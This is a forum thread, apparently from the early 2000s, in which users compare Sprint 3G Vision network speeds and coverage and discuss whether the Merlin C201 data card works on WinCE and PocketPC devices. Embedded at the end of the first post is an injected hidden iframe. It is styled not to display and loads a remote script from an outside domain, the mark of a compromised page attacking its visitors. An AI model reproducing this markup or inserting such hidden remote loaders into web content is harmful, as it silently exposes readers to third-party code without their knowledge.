+ Reply to Thread

3G usage SPEED/COVERAGE

I know a few of your guys have test driven 3G, I guess mainly with the Treo. From what I recall here, the reviews were not all the favorable. One of themarketing claims from Sprint for 3G has been faster speeds and better coverage in "fringe" areas. I have seen the faster speeds issue discussed here, and most of you have reported that while it IS faster, it is not as advertised. I wonder, now that we are a few weeks into Vision, has the speeds improved? Has sprint tweeked it's network at all? Also, those of you who have or have test driven 3G, is the coverage any better.

I still have not decided what to do as far as 3G goes. I'd like to get a data card for my laptop and skip the new handset until the 7135 comes out (or something better). The current new crop of 3G Smartphones are uninspiring to me.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Carl

Well I haven't tested the Treo 300 but have tested the Sprint
    Merlin C201 PC Card on the Vision network and it was not too impressive but better than 14.4 connection. I was benching the speed with those online Internet Speed tests from many different sites and I would get aroung 44k-128k depending on the time of day.

Well, that does not seem too bad, it is about as advertised. I have looked at the C201 card. It is reasonably priced. Any idea if it will work on a WinCE device. I have a jornada 820 that is nice to stick in my bag for trips I don't plan to do any work on, but just in case I need to support someone. I currently can use my Aircard 510 in both the Jornada and my WinXP laptop. I'd like the same flexibility with a 3G wireless modem. Their web page does not mention WinCE.
    Carl

Yes, the C201 card does work with CE it must be PocketPC. When intalling the software it give you an option for regular PC with Windows 9X/2000/XP or PocketPC. Once installed you will need an activation key from Sprint just like their cell phone except they don't use the last 4 digit of the cell phone number. It is okay but maybe I am expect too much too soon. It does give me the ability to use my VPN client on my notebook anyplace that has Sprint signal. It works great with Terminal Server Client and Citrix, have not try the card on PocketPC yet.

Here is more specs on the card:

http://www.novatelwireless.com/pcpro...erlinC201.html

My Jornada is not PocketPC, it is WinCE2.11. It is supported for my AC510 just fine. Maye I will write tech support to see if they plan to release a driver for Ce2.11.
    Carl